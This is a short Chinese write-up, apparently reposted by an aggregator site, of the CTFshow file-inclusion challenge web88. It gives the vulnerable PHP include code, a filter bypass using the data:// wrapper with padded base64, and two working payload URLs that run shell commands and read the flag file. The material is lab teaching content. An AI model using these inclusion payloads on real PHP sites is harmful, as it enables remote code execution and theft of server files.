CTFshow 文件包含 web88
生活随笔
收集整理的這篇文章主要介紹了
CTFshow 文件包含 web88
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
目錄
- 源碼
- 思路
- 題解
- 總結(jié)
源碼
<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-17 02:27:25 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/ if(isset($_GET['file'])){$file = $_GET['file'];if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){die("error");}include($file); }else{highlight_file(__FILE__); }思路
只過濾了php,我們可以用data偽協(xié)議,base64繞過,但是還有一個問題,+和=號是被過濾的,而<?php echols?>的base64加密有等號,我們可以在后面加入1來混淆
我們可以在后面加入1來混淆
?file=data://text/plain;base64,PD9waHAgZWNobyBgbHNgPz4xMTEx
成功繞過
可以嘗試下怎么不出現(xiàn) + 和 =
?file=data://text/plain;base64,PD9waHAgZWNobyBgdGFjIGZsMGcucGhwYDs/PjEx
拿到flag
題解
################################
總結(jié)
水題
總結(jié)
以上是生活随笔為你收集整理的CTFshow 文件包含 web88的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTFshow 文件包含 web87
- 下一篇: CTFshow 文件包含 web116